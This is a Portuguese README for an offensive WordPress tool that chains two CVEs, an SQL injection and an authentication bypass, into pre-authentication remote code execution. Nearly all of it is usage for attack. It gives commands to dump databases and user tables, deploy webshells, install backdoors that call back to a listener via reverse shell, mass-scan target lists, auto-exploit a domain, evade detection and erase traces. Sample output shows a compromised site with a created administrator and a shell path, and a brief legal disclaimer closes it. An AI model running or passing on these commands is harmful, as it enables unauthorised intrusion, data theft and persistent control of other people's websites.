Framework modular de exploração pré-auth do WordPress que encadeia injeção de SQL e bypass de autenticação para fornecer execução remota de código, shells interativos, backdoors e varredura em massa de vulnerabilidades.
CVE-2026-63030 + CVE-2026-60137
Versão: 4.0.0
Autor: G0D150NE
O WP2Shell é uma ferramenta de exploração de cadeia completa para execução remota de código pré-autenticação no WordPress. Ele combina duas vulnerabilidades críticas:
Esta ferramenta permite o comprometimento completo de instalações WordPress vulneráveis sem qualquer autenticação - da detecção ao RCE completo e persistência.
# Clone repository
git clone https://github.com/g0d150ne/wp2shell.git
cd wp2shell
# No dependencies needed - uses Python 3.8+ standard library
chmod +x wp2shell.py
python3 wp2shell.py [COMMAND] [OPTIONS] [TARGET]
| Comando | Descrição |
|---|---|
check | Confirmação não destrutiva de vulnerabilidade |
read | Extração de dados via injeção de SQL |
exploit | Cadeia RCE completa pré-autenticação |
shell | Implantação de webshell com credenciais existentes |
masscan | Varredura em massa de múltiplos alvos |
autopwn | Descoberta automática → varredura → exploração |
python3 wp2shell.py check https://target.com
python3 wp2shell.py check https://target.com --confirm-timing --sleep 5
Fingerprint básico:
python3 wp2shell.py read https://target.com
Extrair usuários:
python3 wp2shell.py read https://target.com --preset users
Consulta personalizada:
python3 wp2shell.py read https://target.com --query "SELECT @@version"
Gerar dump do banco de dados inteiro:
python3 wp2shell.py read https://target.com --preset dumpall --max-length 4096
Exploração básica:
python3 wp2shell.py exploit https://target.com
Exploração com shell interativo:
python3 wp2shell.py exploit https://target.com --interactive
Exploração com instalação de backdoor:
python3 wp2shell.py exploit https://target.com --backdoor --lhost 192.168.1.100 --lport 4444
Exploração com dump do banco de dados:
python3 wp2shell.py exploit https://target.com --dumpdb
Exploração com limpeza (remover rastros):
python3 wp2shell.py exploit https://target.com --cleanup
python3 wp2shell.py shell https://target.com --user admin --password secret123 --interactive
python3 wp2shell.py shell https://target.com --user admin --password secret123 --command "whoami"
# Create targets file
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt
# Scan with 50 threads
python3 wp2shell.py masscan --file targets.txt --threads 50 --output results.csv
python3 wp2shell.py autopwn --domain example.com --lhost 192.168.1.100
Isso irá:
Após a exploração, você obtém um shell interativo completo:
python3 wp2shell.py exploit https://target.com -i
[*] Interactive shell — type 'exit' to quit
/var/www/html $ id
uid=33(www-data) gid=33(www-data)
/var/www/html $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
...
/var/www/html $ exit
| Opção | Descrição |
|---|---|
--timeout | Tempo limite (timeout) HTTP em segundos (padrão: 30) |
--proxies | Lista de proxies separados por vírgula (ex.: http://127.0.0.1:8080) |
--stealth | Ativa o modo furtivo com atrasos aleatórios |
-v, --verbose | Ativa a saída de depuração |
-q, --quiet | Suprime o banner e as mensagens informativas |
| Opção | Descrição |
|---|---|
--prefix | Prefixo da tabela (padrão: wp_) |
--auto-prefix | Descobre automaticamente o prefixo da tabela |
--max-length | Máximo de caracteres por valor (padrão: 128) |
--technique | Técnica de extração: auto/union/error/blind |
--preset | Predefinição de dados: fingerprint/users/dumpall |
--query | Expressão SQL arbitrária para extrair |
| Opção | Descrição |
|---|---|
--prefix | Prefixo da tabela (padrão: wp_) |
--no-discover | Pular a descoberta automática, usar padrões |
-i, --interactive | Abrir shell após a exploração |
-c, --command | Executar um único comando após a exploração |
--backdoor | Instalar backdoor de persistência |
--lhost | LHOST para reverse shell (padrão: 10.0.0.1) |
--lport | LPORT para reverse shell (padrão: 4444) |
--dumpdb | Gerar dump do banco de dados após a exploração |
--cleanup | Excluir o usuário criado e o webshell ao sair |
Injeção de SQL (CVE-2026-63030)
/wp-json/batch/v1author_exclude é vulnerável a SQLi cego baseado em tempoBypass de Autenticação (CVE-2026-60137)
/_embed| Versão | Status |
|---|---|
| 6.9.0 | ✅ Vulnerável |
| 6.9.1 | ✅ Vulnerável |
| 6.9.2 | ✅ Vulnerável |
| 6.9.3 | ✅ Vulnerável |
| 6.9.4 | ✅ Vulnerável |
| 7.0.0 | ✅ Vulnerável |
| 7.0.1 | ✅ Vulnerável |
| ≥ 7.0.2 | ❌ Corrigida |
| Técnica | Velocidade | Tamanho dos Dados | Requisitos |
|---|---|---|---|
| UNION | ⚡ Muito rápida | Ilimitado | O alvo não deve filtrar UNION |
| Error | 🚀 Rápida | ~30 caracteres/req | O alvo deve expor mensagens de erro |
| Blind | 🐢 Lenta | Ilimitado | Oracle booleano disponível |
░▒▓█▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓███████▓▒░▒▓███████▓▒░ ░▒▓███████▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓████████▓▒░▒▓█▓▒░ ░▒▓█▓▒░
CVE-2026-63030 + CVE-2026-60137
WordPress Pre-Auth RCE [v4.0.0]
+ G0D150NE
[1/7] Reconnaissance
Target: https://target.com
WordPress 6.9.3
[+] UNION extraction available (in-band, 1 request/value)
[2/7] Enumerating target
[+] Discovered table prefix: wp_
[3/7] Locating embed target
[+] Embed URL: https://target.com/2020/01/01/hello-world/
[4/7] Seeding oEmbed cache posts
[+] Seed payload delivered
[5/7] Extracting cache post IDs
[+] Cache IDs: [12345, 12346, 12347, 12348]
[6/7] Triggering escalation chain
[+] Administrator created via re-entry chain
[7/7] Deploying webshell
[+] Authenticated
[+] RCE confirmed
uid: www-data
[+] ========================================================
[+] TARGET COMPROMISED
[+] Admin: wp_service_a1b2 / G7hK9xQw2p$L!mN
[+] Shell: https://target.com/wp-content/plugins/cache_a1b2/cache_a1b2.php
[+] ========================================================
Esta ferramenta é apenas para testes de segurança autorizados e fins educacionais. O uso contra sistemas sem permissão explícita é ilegal. Os autores não assumem responsabilidade por qualquer uso indevido.
Encontrou um bug? Quer melhorar a ferramenta? Pull requests são bem-vindos!
Licença MIT - Consulte o arquivo LICENSE para obter detalhes.